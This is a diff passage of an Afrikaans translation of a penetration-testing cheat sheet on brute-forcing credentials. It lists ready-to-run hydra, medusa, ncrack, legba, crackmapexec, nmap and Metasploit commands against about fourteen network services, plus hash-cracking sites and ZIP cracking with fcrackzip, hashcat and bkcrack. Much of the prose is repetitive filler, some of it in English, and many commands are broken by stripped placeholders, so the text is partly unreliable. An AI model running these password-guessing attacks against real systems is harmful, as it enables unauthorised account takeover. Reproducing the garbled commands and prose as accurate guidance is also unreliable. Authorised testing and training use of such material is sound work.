aanvalsvektor vir 'n brute force-aanval, waar 'n aanvaller probeer om deur herhaaldelike pogings om verskillende kombinasies van gebruikersname en wagwoorde te raai, toegang tot die bediener te verkry. + +Om 'n brute force-aanval teen Rexec uit te voer, kan 'n aanvaller 'n woordelys van moontlike wagwoorde gebruik en dit een vir een probeer totdat die regte kombinasie gevind word. Dit kan 'n tydrowende proses wees, maar as die wagwoord swak is of maklik te raai is, kan die aanvaller suksesvol wees. + +Dit is belangrik om sterk en unieke wagwoorde te gebruik om te voorkom dat 'n brute force-aanval suksesvol is. Daar is ook tegnieke soos die implementering van 'n wagwoordbeleid, die gebruik van tweefaktor-verifikasie en die beperking van die aantal mislukte aanmeldingspogings wat kan help om die risiko van 'n brute force-aanval te verminder. ```bash hydra -l -P rexec:// -v -V ``` - ### Rlogin +Rlogin is 'n protokol wat gebruik word om 'n verband te maak met 'n afgeleë rekenaar oor 'n netwerk. Dit maak gebruik van 'n eenvoudige gebruikersnaam en wagwoord vir verifikasie. Rlogin is 'n onveilige protokol omdat dit nie versleuteling gebruik nie, wat beteken dat die gebruikersnaam en wagwoord in die oop gesien kan word deur 'n aanvaller wat die netwerkverkeer onderskep. + +Brute force-aanvalle kan gebruik word om toegang te verkry tot 'n rlogin-rekening deur verskeie kombinasies van gebruikersname en wagwoorde te probeer. Hierdie aanvalle kan uitgevoer word met behulp van gereedskap soos Hydra of Medusa, wat outomatiese aanvalle op rlogin-dienste kan uitvoer deur 'n woordelys van moontlike wagwoorde te gebruik. + +Dit is belangrik om te verseker dat sterk en unieke wagwoorde gebruik word vir rlogin-rekeninge om die risiko van 'n suksesvolle brute force-aanval te verminder. Daarbenewens kan die implementering van 'n veiliger protokol soos SSH oorweeg word om die veiligheid van die netwerkverbindings te verbeter. ```bash hydra -l -P rlogin:// -v -V ``` - ### Rsh +Rsh (Remote Shell) is a network protocol that allows users to execute commands on a remote system. It is commonly used for remote administration tasks. + +#### Brute-Forcing Rsh + +To brute-force Rsh, you can use tools like Hydra or Medusa. These tools automate the process of trying different username and password combinations until a successful login is found. + +Here is an example command using Hydra to brute-force Rsh: + +```plaintext +hydra -l -P rsh:// +``` + +Replace `` with the target username, `` with the path to a file containing a list of passwords, and `` with the IP address of the target system. + +#### Mitigating Rsh Brute-Force Attacks + +To protect against Rsh brute-force attacks, it is recommended to disable the Rsh service if it is not needed. If Rsh is required, strong passwords should be used and account lockout policies should be implemented to prevent multiple failed login attempts. Additionally, monitoring and logging of Rsh login attempts can help detect and respond to brute-force attacks. ```bash hydra -L rsh:// -v -V ``` - [http://pentestmonkey.net/tools/misc/rsh-grind](http://pentestmonkey.net/tools/misc/rsh-grind) ### Rsync +Rsync is a utility commonly used for file synchronization and transfer. It allows for efficient copying and updating of files between different systems. Rsync uses the SSH protocol for secure communication and can be used both locally and remotely. It is particularly useful for transferring large files or directories and can be automated for regular backups or data replication. Rsync supports various options and can be customized to suit specific needs. ```bash nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 ``` - ### RTSP +RTSP (Real Time Streaming Protocol) is 'n protokol wat gebruik word vir die stroomlynige oordrag van multimedia data oor IP-netwerke. Dit word dikwels gebruik vir die stroomlynige uitsending van video- en klankinhoud. RTSP maak gebruik van die TCP- of UDP-protokol vir die oordrag van data. + +#### Brute Force-aanvalle teen RTSP + +'n Brute Force-aanval teen 'n RTSP-diens behels die outomatiese poging van verskillende kombinasies van gebruikersname en wagwoorde om toegang tot die diens te verkry. Hierdie aanvalle kan uitgevoer word deur gebruik te maak van gereedskap soos Hydra of Medusa. + +Om 'n suksesvolle brute force-aanval teen 'n RTSP-diens uit te voer, is dit belangrik om 'n lys van algemene gebruikersname en wagwoorde te hê. Hierdie lys kan bestaan uit standaardwaardes wat dikwels gebruik word deur gebruikers of beheerders. Dit is ook nuttig om te kyk na enige gelekte wagwoorde wat verband hou met die betrokke RTSP-diens. + +Daarbenewens kan dit nuttig wees om 'n woordelys te gebruik wat bestaan uit algemene woorde, frases en kombinasies wat dikwels gebruik word as wagwoorde. Hierdie woordelys kan gebruik word deur gereedskap soos Hydra of Medusa om die brute force-aanval uit te voer. + +Dit is belangrik om te onthou dat brute force-aanvalle tydrowend kan wees en dat dit 'n groot hoeveelheid pogings kan vereis voordat 'n suksesvolle kombinasie van gebruikersname en wagwoorde gevind word. Daarom is dit belangrik om geduldig te wees en om die nodige tyd en hulpbronne toe te ken aan die uitvoering van die aanval. ```bash hydra -l root -P passwords.txt rtsp ``` - ### SFTP +SFTP (Secure File Transfer Protocol) is 'n veilige protokol wat gebruik word vir die oordrag van lêers tussen 'n kliënt en 'n bediener. Dit bied 'n veilige en versleutelde verbinding om te verseker dat die oorgedraagde data beskerm word teen afluistering en manipulasie. + +SFTP maak gebruik van 'n sterk kriptografiese protokol om die data te beskerm. Dit maak gebruik van 'n sleuteluitruilproses om 'n veilige sessiesleutel te genereer, wat dan gebruik word om die data te versleutel en te ontsluit. Hierdie versleuteling verseker dat slegs die beoogde ontvanger toegang tot die data het. + +Om SFTP te gebruik, moet jy 'n SFTP-kliënt installeer en konfigureer. Die kliënt stel jou in staat om 'n veilige verbinding met die SFTP-bedieners te maak en lêers oor te dra. Jy sal die nodige inligting, soos die bedieneradres, gebruikersnaam en wagwoord, benodig om die verbinding op te stel. + +SFTP kan gebruik word vir verskeie doeleindes, soos die oordra van lêers tussen gebruikers, die maak van rugsteunkopieë van data, en die deel van lêers met ander gebruikers. Dit is 'n veilige en betroubare manier om lêers oor te dra en te deel, en word dikwels gebruik in omgewings waar data-integriteit en vertroulikheid belangrik is. ```bash legba sftp --username admin --password wordlists/passwords.txt --target localhost:22 # Try keys from a folder legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22 ``` - ### SNMP +SNMP (Simple Network Management Protocol) is 'n protokol wat gebruik word om netwerktoestelle te bestuur en te moniteer. Dit maak gebruik van 'n klient-bedienersmodel, waar die SNMP-bestuurder funksies uitvoer op die SNMP-agent op die toestel. + +SNMP maak gebruik van 'n reeks standaardopdragte om inligting van die toestel te bekom en om konfigurasie-aanpassings te maak. Hierdie opdragte sluit in: + +- `GET`: Versoek om 'n spesifieke inligtingswaarde van die toestel te kry. +- `SET`: Stel 'n spesifieke inligtingswaarde op die toestel in. +- `GETNEXT`: Versoek om die volgende inligtingswaarde in 'n reeks waardes te kry. +- `GETBULK`: Versoek om 'n groot hoeveelheid inligtingswaardes in een keer te kry. +- `TRAP`: Stuur 'n kennisgewing na die bestuurder wanneer 'n spesifieke gebeurtenis plaasvind. + +SNMP is 'n nuttige hulpmiddel vir netwerkbestuur en -monitering, maar dit kan ook 'n potensiële veiligheidsrisiko wees as dit nie behoorlik geïmplementeer en beveilig word nie. Dit is belangrik om sterk gemeenskapstrings te gebruik, toegang tot SNMP-dienste te beperk en die nodige veiligheidsmaatreëls te tref om te verseker dat slegs geaggregeerde inligting verkry word en dat geen sensitiewe inligting blootgestel word nie. ```bash msf> use auxiliary/scanner/snmp/snmp_login nmap -sU --script snmp-brute [--script-args snmp-brute.communitiesdb= ] onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp ``` - ### SMB +SMB (Server Message Block) is 'n protokol wat gebruik word vir die deel van lêers, drukkers, portefeuljes en ander hulpbronne tussen rekenaars op 'n netwerk. Dit is 'n belangrike protokol vir Windows-omgewings en word gebruik vir die bestuur van lêertoegang en netwerkverbindings. + +#### Brute Force-aanvalle op SMB + +'n Brute Force-aanval op SMB is 'n metode waar 'n aanvaller probeer om toegang te verkry tot 'n SMB-bedienaar deur verskeie wagwoorde te probeer. Die aanvaller gebruik 'n lys van potensiële wagwoorde en probeer elkeen totdat die regte wagwoord gevind word. Hierdie tipe aanval kan baie tydrowend wees, maar dit kan suksesvol wees as die regte wagwoord swak of maklik te raai is. + +#### Beskerming teen Brute Force-aanvalle op SMB + +Om jou SMB-bedienaar teen brute force-aanvalle te beskerm, kan jy die volgende maatreëls tref: + +- Stel 'n sterk wagwoordbeleid in wat vereis dat gebruikers sterk en unieke wagwoorde gebruik. +- Beperk die aantal mislukte aanmeldpogings wat 'n gebruiker kan maak voordat hulle tydelik geblokkeer word. +- Implementeer 'n multi-faktor-verifikasie-stelsel om die aanmeldproses te versterk. +- Monitor en analiseer aanmeldpogings om verdagte aktiwiteit te identifiseer. +- Verseker dat jou SMB-bedienaar opgedateer is met die nuutste veiligheidsoplossings en patches. + +Deur hierdie maatreëls te implementeer, kan jy die risiko van 'n suksesvolle brute force-aanval op jou SMB-bedienaar verminder. ```bash nmap --script smb-brute -p 445 hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1 legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup ] [--smb-share ] ``` - ### SMTP +SMTP (Simple Mail Transfer Protocol) is 'n protokol wat gebruik word om e-posse te stuur en te ontvang. Dit is 'n algemene protokol wat deur e-posdienste gebruik word om kommunikasie tussen verskillende e-posbedieners te fasiliteer. + +SMTP-bruteforcing is 'n tegniek wat gebruik word om toegang tot 'n e-posrekening te verkry deur verskeie kombinasies van gebruikersname en wagwoorde te probeer. Dit kan gedoen word deur 'n program of 'n spesifieke gereedskap wat ontwerp is vir SMTP-bruteforcing. + +Hier is 'n voorbeeld van hoe 'n bruteforce-aanval op 'n SMTP-bedienaar sou lyk: + +```plaintext +EHLO example.com +AUTH LOGIN +Username: admin +Password: password1 +``` + +In hierdie voorbeeld word die EHLO-opdrag gebruik om die identiteit van die afstuurder te identifiseer. Dan word die AUTH LOGIN-opdrag gebruik om die gebruikersnaam en wagwoord te verifieer. In hierdie geval word die gebruikersnaam as "admin" en die wagwoord as "password1" gespesifiseer. + +Dit is belangrik om te onthou dat SMTP-bruteforcing 'n aanval is en dat dit onwettig is om dit sonder toestemming uit te voer. Dit word meestal gebruik deur etiese hackers en sekuriteitskonsultante as 'n metode om die veiligheid van 'n e-posstelsel te toets. ```bash hydra -l -P /path/to/passwords.txt smtp -V hydra -l -P /path/to/passwords.txt -s 587 -S -v -V #Port 587 for SMTP with SSL legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism ] ``` - ### SOCKS +SOCKS (Socket Secure) is 'n protokol wat gebruik word om 'n veilige verbinding te skep tussen 'n klient en 'n bediener deur middel van 'n proxy-bedienersagteware. Dit maak dit moontlik vir die klient om verbindings te maak met bedieners agter 'n vuremuur of NAT (Network Address Translation) en om anoniem te bly deur die IP-adres van die klient te verberg. + +SOCKS-protokol ondersteun verskillende weergawes, insluitend SOCKS4 en SOCKS5. SOCKS5 is die mees gebruikte weergawe en bied aanvullende funksies soos outentisering en UDP (User Datagram Protocol) deurvoer. + +Brute force-aanvalle kan uitgevoer word deur SOCKS te gebruik om verbindings te maak met 'n bediener en dan verskillende wagwoorde of sleutels te probeer om toegang te verkry tot 'n stelsel of rekening. Hierdie aanvalte kan gebruik word om swak wagwoordbeleide te misbruik of om toegang te verkry tot rekeninge deur middel van herhaalde pogings. + +Dit is belangrik om te verseker dat sterk wagwoorde gebruik word en dat toegang tot die SOCKS-bedienersagteware beperk word tot vertroude gebruikers om brute force-aanvalle te voorkom. ```bash nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 legba socks5 --target localhost:1080 --username admin --password data/passwords.txt # With alternative address legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080 ``` - ### SQL Server +SQL Server is 'n relatiewe databasisbestuurstelsel wat deur Microsoft ontwikkel is. Dit bied 'n veilige en betroubare omgewing vir die stoor en bestuur van data. SQL Server ondersteun 'n verskeidenheid van funksies en tegnieke vir die hantering van data, insluitend die gebruik van SQL (Structured Query Language) vir die uitvoering van vrae en manipulasie van data. + +#### Brute Force-aanvalle op SQL Server + +'N Brute Force-aanval is 'n aanvalstegniek wat gebruik word om toegang te verkry tot 'n SQL Server-databasis deur herhaaldelik te probeer om gebruikersname en wagwoorde te raai. Hierdie aanval maak gebruik van 'n lys van moontlike gebruikersname en wagwoorde en probeer elke kombinasie totdat die regte kombinasie gevind word. + +Om 'n Brute Force-aanval op 'n SQL Server-databasis uit te voer, kan 'n aanvaller gebruik maak van verskillende hulpmiddels en tegnieke, soos: + +- **Woordelys-aanval**: Hierdie aanval maak gebruik van 'n lys van algemene woorde en wagwoorde om te probeer om toegang te verkry tot die databasis. Die aanvaller kan 'n woordelys van algemene wagwoorde gebruik, soos "password" of "123456", of 'n spesifieke woordelys wat relevant is vir die teikenomgewing. +- **Brute Force-aanval met kragtige rekenaarbronne**: Hierdie aanval maak gebruik van 'n kragtige rekenaarbronne, soos 'n GPU (Graphics Processing Unit) of 'n stel hoëpresterende rekenaars, om 'n groot aantal kombinasies van gebruikersname en wagwoorde vinnig te probeer. Dit kan die tyd wat nodig is om 'n suksesvolle aanval uit te voer, aansienlik verkort. +- **Brute Force-aanval met parallelle verwerking**: Hierdie aanval maak gebruik van parallelle verwerkingstegnieke om gelyktydig 'n groot aantal kombinasies van gebruikersname en wagwoorde te probeer. Dit kan die tyd wat nodig is om 'n suksesvolle aanval uit te voer, verminder. + +Om 'n Brute Force-aanval op 'n SQL Server-databasis te voorkom, kan die volgende maatreëls geneem word: + +- **Sterk wagwoordbeleid**: Implementeer 'n sterk wagwoordbeleid wat vereis dat gebruikers sterk en unieke wagwoorde gebruik. Dit kan die moeilikheid verhoog om 'n wagwoord te raai deur 'n Brute Force-aanvaller. +- **Beperk aantal pogings**: Beperk die aantal pogings wat 'n gebruiker kan maak om in te teken op die SQL Server-databasis. Deur die aantal pogings te beperk, kan dit moeiliker wees vir 'n Brute Force-aanvaller om suksesvolle kombinasies van gebruikersname en wagwoorde te vind. +- **Tweeledige verifikasie**: Implementeer tweeledige verifikasie vir toegang tot die SQL Server-databasis. Hierdie maatreël vereis dat gebruikers 'n tweede vorm van verifikasie, soos 'n eenmalige wagwoord of 'n biometriese identifikasie, gebruik om toegang te verkry. +- **Monitoraktiwiteit**: Monitor die aktiwiteit op die SQL Server-databasis om verdagte pogings tot Brute Force-aanvalle te identifiseer. Deur aktiwiteit te monitor, kan potensiële aanvalle vroegtydig opgespoor en voorkom word. + +Dit is belangrik om te verseker dat die SQL Server-databasis behoorlik beveilig is teen Brute Force-aanvalle om die integriteit en vertroulikheid van die data te beskerm. ```bash #Use the NetBIOS name of the machine as domain crackmapexec mssql -d -u usernames.txt -p passwords.txt @@ -479,9 +791,24 @@ medusa -h –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssq nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT ``` - ### SSH +SSH (Secure Shell) is 'n protokol wat gebruik word vir veilige kommunikasie en veilige toegang tot 'n afgeleë stelsel. Dit bied 'n veilige manier om op afstand te verbind met 'n stelsel en dit te bestuur. SSH maak gebruik van kriptografie om die vertroulikheid en integriteit van die data wat oorgedra word te verseker. + +#### Brute Force-aanvalle op SSH + +'n Brute Force-aanval op SSH is 'n metode waar 'n aanvaller probeer om toegang te verkry tot 'n SSH-stelsel deur verskeie moontlike kombinasies van gebruikersname en wagwoorde te probeer. Die aanvaller gebruik 'n program of skripsie om outomaties die kombinasies te probeer, totdat die regte kombinasie gevind word. + +Hier is 'n paar tegnieke wat gebruik kan word om 'n brute force-aanval op SSH te voorkom: + +- **Sterk wagwoorde**: Gebruik lang en komplekse wagwoorde wat moeilik is om te raai. +- **Tweefaktor-verifikasie**: Stel tweefaktor-verifikasie in vir SSH, wat 'n ekstra laag van beveiliging bied deur 'n tweede verifikasiefaktor te vereis, soos 'n eenmalige wagwoord of 'n biometriese identifikasie. +- **Beperk toegang**: Beperk die toegang tot SSH deur slegs spesifieke IP-adresse of subnetwerke toe te laat. +- **Monitor aktiwiteit**: Monitor die SSH-loglêers vir verdagte aktiwiteit, soos herhaalde mislukte aanmeldingspogings. +- **Verander die standaard SSH-poort**: Verander die standaard SSH-poort na 'n ander poort om die aanvallers te ontmoedig. +- **Gebruik sleutelpare**: Gebruik SSH-sleutelpare in plaas van wagwoorde vir verifikasie. Dit bied 'n hoër vlak van beveiliging omdat die private sleutel nie oorgedra word nie. + +Deur hierdie maatreëls te implementeer, kan jy die risiko van 'n suksesvolle brute force-aanval op jou SSH-stelsel verminder. ```bash hydra -l root -P passwords.txt [-t 32] ssh ncrack -p 22 --user root -P passwords.txt [-T 5] @@ -491,38 +818,58 @@ legba ssh --username admin --password wordlists/passwords.txt --target localhost # Try keys from a folder legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22 ``` +#### Swak SSH-sleutels / Debian voorspelbare PRNG -#### Weak SSH keys / Debian predictable PRNG +Sommige stelsels het bekende foute in die lukrake saad wat gebruik word om kriptografiese materiaal te genereer. Dit kan lei tot 'n drasties verminderde sleutelruimte wat met hulpmiddels soos [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute) gekraak kan word. Vooraf gegenereerde stelle swak sleutels is ook beskikbaar soos [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh). -Some systems have known flaws in the random seed used to generate cryptographic material. This can result in a dramatically reduced keyspace which can be bruteforced with tools such as [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute). Pre-generated sets of weak keys are also available such as [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh). - -### STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ) - -The STOMP text protocol is a widely used messaging protocol that **allows seamless communication and interaction with popular message queueing services** such as RabbitMQ, ActiveMQ, HornetQ, and OpenMQ. It provides a standardized and efficient approach to exchange messages and perform various messaging operations. +### STOMP (ActiveMQ, RabbitMQ, HornetQ en OpenMQ) +Die STOMP-teksprotokol is 'n wye gebruikte boodskapprotokol wat **naadlose kommunikasie en interaksie met gewilde boodskapwagdienste** soos RabbitMQ, ActiveMQ, HornetQ en OpenMQ moontlik maak. Dit bied 'n gestandaardiseerde en doeltreffende benadering om boodskappe uit te ruil en verskeie boodskapverrigtinge uit te voer. ```bash legba stomp --target localhost:61613 --username admin --password data/passwords.txt ``` - ### Telnet +Telnet is 'n protokol wat gebruik word vir die kommunikasie met 'n bediener oor 'n netwerk. Dit maak dit moontlik om op afstand te verbind met 'n bediener en opdragte uit te voer. Telnet is 'n onveilige protokol omdat die inligting wat oorgedra word nie versleutel is nie. Dit beteken dat 'n aanvaller die inligting wat oorgedra word kan onderskep en lees. + +#### Brute Force-aanvalle op Telnet + +'n Brute Force-aanval op Telnet behels die gebruik van outomatiese sagteware om verskillende kombinasies van gebruikersname en wagwoorde te probeer om toegang tot 'n Telnet-bediening te verkry. Hierdie aanvalle is gebaseer op die feit dat baie gebruikers swak wagwoorde gebruik wat maklik te raai is. Die aanvaller sal 'n lys van algemene wagwoorde gebruik en dit een vir een probeer totdat 'n suksesvolle kombinasie gevind word. + +#### Teenmaatreëls teen Brute Force-aanvalle op Telnet + +Om jouself teen Brute Force-aanvalle op Telnet te beskerm, kan jy die volgende teenmaatreëls implementeer: + +- Verander die standaard Telnet-poort na 'n ander poort om die aanvaller te verwar. +- Stel 'n sterk wagwoordbeleid in en moedig gebruikers aan om unieke en komplekse wagwoorde te gebruik. +- Beperk die aantal mislukte aanmeldingspogings om te voorkom dat 'n aanvaller herhaaldelik probeer om toegang te verkry. +- Implementeer tweefaktor-verifikasie om 'n ekstra laag van sekuriteit toe te voeg. +- Monitor die Telnet-loglêers vir verdagte aktiwiteit en neem onmiddellik aksie as 'n aanval gedetekteer word. + +Deur hierdie teenmaatreëls te implementeer, kan jy die risiko van 'n suksesvolle Brute Force-aanval op Telnet verminder. ```bash hydra -l root -P passwords.txt [-t 32] telnet ncrack -p 23 --user root -P passwords.txt [-T 5] medusa -u root -P 500-worst-passwords.txt -h -M telnet legba telnet \ - --username admin \ - --password wordlists/passwords.txt \ - --target localhost:23 \ - --telnet-user-prompt "login: " \ - --telnet-pass-prompt "Password: " \ - --telnet-prompt ":~$ " \ - --single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin +--username admin \ +--password wordlists/passwords.txt \ +--target localhost:23 \ +--telnet-user-prompt "login: " \ +--telnet-pass-prompt "Password: " \ +--telnet-prompt ":~$ " \ +--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin ``` - ### VNC +VNC (Virtual Network Computing) is 'n protokol wat gebruik word om 'n grafiese gebruikerskoppelvlak (GUI) oor 'n netwerk te deel. Dit maak dit moontlik vir 'n gebruiker om 'n afgeleë rekenaar te bedien en toegang te verkry tot die grafiese omgewing daarvan. VNC kan gebruik word vir afstandbeheer, hulp op afstand, demonstrasies en ander toepassings waar 'n grafiese gebruikerskoppelvlak oor 'n netwerk gedeel moet word. + +'n Brute force-aanval teen VNC behels die gebruik van 'n program of skripsie om verskeie kombinasies van gebruikersname en wagwoorde te probeer om toegang tot 'n VNC-bedieningspaneel te verkry. Hierdie aanval is effektief wanneer die gebruikersname en wagwoord swak of maklik te raai is. Dit is belangrik om sterk en unieke wagwoorde te gebruik om te voorkom dat 'n brute force-aanval suksesvol is. + +Daar is verskeie hulpmiddels en tegnieke beskikbaar om 'n brute force-aanval teen VNC uit te voer. Dit sluit in die gebruik van hulpmiddels soos Hydra, Medusa en Ncrack, wat spesifiek ontwerp is vir die uitvoer van brute force-aanvalle. Dit is ook moontlik om 'n eie skripsie te skryf om 'n brute force-aanval teen VNC uit te voer. + +Dit is belangrik om te onthou dat die uitvoer van 'n brute force-aanval teen VNC onwettig kan wees sonder die toestemming van die eienaar van die stelsel. Dit is altyd raadsaam om 'n wettige en etiese benadering tot hacking te volg en slegs toestemming te verkry om enige vorm van aanvalle uit te voer. ```bash hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s vnc medusa -h –u root -P /root/Desktop/pass.txt –M vnc @@ -537,43 +884,95 @@ use auxiliary/scanner/vnc/vnc_login set RHOSTS set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst ``` - ### Winrm +Winrm is 'n protokol wat gebruik word om op afstand te bestuur en te bestuur Windows-masjiene. Dit maak gebruik van die HTTP-gebaseerde protokol om kommunikasie tussen die klient en die bediener te fasiliteer. Winrm maak gebruik van die SOAP-gebaseerde protokol vir die uitruil van boodskappe. + +#### Brute Force-aanvalle teen Winrm + +Brute force-aanvalle teen Winrm is 'n metode waar 'n aanvaller probeer om toegang te verkry tot 'n Windows-masjien deur verskeie wagwoorde te probeer. Hierdie aanvalle kan uitgevoer word deur gebruik te maak van gereedskap soos Hydra, Medusa of 'n aangepaste skripsie. + +#### Voorkoming van Brute Force-aanvalle teen Winrm + +Om brute force-aanvalle teen Winrm te voorkom, kan die volgende maatreëls geneem word: + +- Stel 'n sterk wagwoordbeleid in wat vereis dat gebruikers sterk en unieke wagwoorde gebruik. +- Beperk die aantal toegewyde pogings wat 'n gebruiker kan maak om in te teken. +- Implementeer 'n tydvertraging tussen mislukte aanmeldingspogings. +- Monitor en analiseer loglêers vir verdagte aktiwiteit. +- Stel tweefaktor-verifikasie in vir aanmelding. + +#### Aanbevole gereedskap vir Brute Force-aanvalle teen Winrm + +Hier is 'n paar gereedskap wat gebruik kan word vir brute force-aanvalle teen Winrm: + +- Hydra: 'n gereedskap wat gebruik word vir die outomatiese aanval van verskeie protokolle, insluitend Winrm. +- Medusa: 'n vinnige, modulêre en outomatiese gereedskap vir die aanval van verskeie protokolle. +- Ncrack: 'n hoogs aanpasbare gereedskap vir die aanval van verskeie protokolle, insluitend Winrm. + +#### Aanbevole bestuurders vir Brute Force-aanvalle teen Winrm + +Hier is 'n paar bestuurders wat gebruik kan word vir brute force-aanvalle teen Winrm: + +- Wordlist: 'n lys van moontlike wagwoorde wat gebruik kan word vir die aanval. +- Woordenboek: 'n lys van algemene woorde wat gebruik kan word vir die aanval. +- Masker: 'n patroon wat gebruik kan word om wagwoorde te genereer. +- Regel: 'n reël wat gebruik kan word om wagwoorde te genereer deur spesifieke karakters in te sluit of uit te sluit. + +#### Aanbevole tegnieke vir Brute Force-aanvalle teen Winrm + +Hier is 'n paar tegnieke wat gebruik kan word vir brute force-aanvalle teen Winrm: + +- Enkel wagwoordaanval: 'n aanval waar 'n enkele wagwoord herhaaldelik probeer word. +- Woordlystaanval: 'n aanval waar 'n lys van wagwoorde een vir een probeer word. +- Maskeraanval: 'n aanval waar 'n wagwoord gegenereer word deur 'n patroon te volg. +- Regelgebaseerde aanval: 'n aanval waar 'n wagwoord gegenereer word deur 'n spesifieke reël te volg. + +#### Aanbevole maatreëls vir Brute Force-aanvalle teen Winrm + +Hier is 'n paar maatreëls wat geneem kan word om brute force-aanvalle teen Winrm te beperk: + +- Monitor die netwerk vir verdagte aktiwiteit en ongewone patrone. +- Stel 'n sterk wagwoordbeleid in wat vereis dat gebruikers sterk en unieke wagwoorde gebruik. +- Beperk die aantal toegewyde pogings wat 'n gebruiker kan maak om in te teken. +- Implementeer 'n tydvertraging tussen mislukte aanmeldingspogings. +- Stel tweefaktor-verifikasie in vir aanmelding. +- Verseker dat die bediener se sagteware en toepassings opgedateer word met die nuutste beveiligingspatches. +- Monitor en analiseer loglêers vir verdagte aktiwiteit. +- Stel 'n netwerkfirewall in om ongewenste toegang te beperk. +- Beperk die toegang tot die Winrm-diens tot slegs vertroude IP-adresse. +- Stel 'n stelsel van waarskuwings en alarms in om te reageer op verdagte aktiwiteit. ```bash crackmapexec winrm -d -u usernames.txt -p passwords.txt ``` -
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Local +## Plaaslik -### Online cracking databases +### Aanlyn kraakdatabasisse * [~~http://hashtoolkit.com/reverse-hash?~~](http://hashtoolkit.com/reverse-hash?) (MD5 & SHA1) -* [https://shuck.sh/get-shucking.php](https://shuck.sh/get-shucking.php) (MSCHAPv2/PPTP-VPN/NetNTLMv1 with/without ESS/SSP and with any challenge's value) -* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) (Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...) -* [https://crackstation.net/](https://crackstation.net) (Hashes) +* [https://shuck.sh/get-shucking.php](https://shuck.sh/get-shucking.php) (MSCHAPv2/PPTP-VPN/NetNTLMv1 met/sonder ESS/SSP en met enige uitdaging se waarde) +* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) (Hashe, WPA2-vangste, en argiewe MSOffice, ZIP, PDF...) +* [https://crackstation.net/](https://crackstation.net) (Hashe) * [https://md5decrypt.net/](https://md5decrypt.net) (MD5) -* [https://gpuhash.me/](https://gpuhash.me) (Hashes and file hashes) -* [https://hashes.org/search.php](https://hashes.org/search.php) (Hashes) -* [https://www.cmd5.org/](https://www.cmd5.org) (Hashes) +* [https://gpuhash.me/](https://gpuhash.me) (Hashe en lêerhashe) +* [https://hashes.org/search.php](https://hashes.org/search.php) (Hashe) +* [https://www.cmd5.org/](https://www.cmd5.org) (Hashe) * [https://hashkiller.co.uk/Cracker](https://hashkiller.co.uk/Cracker) (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512) * [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) (MD5) * [http://reverse-hash-lookup.online-domain-tools.com/](http://reverse-hash-lookup.online-domain-tools.com) -Check this out before trying to brute force a Hash. +Kyk hierna voordat jy probeer om 'n Hash te kragtig te kraak. ### ZIP - ```bash -#sudo apt-get install fcrackzip +#sudo apt-get install fcrackzip fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip ``` @@ -587,12 +986,10 @@ john zip.john hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt .\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack ``` +#### Bekende teks zip-aanval -#### Known plaintext zip attack - -You need to know the **plaintext** (or part of the plaintext) **of a file contained inside** the encrypted zip. You can check **filenames and size of files contained inside** an encrypted zip running: **`7z l encrypted.zip`**\ -Download [**bkcrack** ](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0)from the releases page. - +Jy moet die **teks** (of 'n deel van die teks) **van 'n lêer wat binne-in die versleutelde zip lê** ken. Jy kan die **lêernaam en grootte van lêers wat binne-in** 'n versleutelde zip lê uitvoer deur die volgende te hardloop: **`7z l encrypted.zip`**\ +Laai [**bkcrack** ](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0) af van die vrystellingsbladsy. ```bash # You need to create a zip file containing only the file that is inside the encrypted zip zip plaintext.zip plaintext.file @@ -601,12 +998,26 @@ zip plaintext.zip plaintext.file # Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18 # With that key you can create a new zip file with the content of encrypted.zip # but with a different pass that you set (so you can decrypt it) -./bkcrack -C -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd +./bkcrack -C -k 7b549874 ebc25ec5 7e465e18 -U 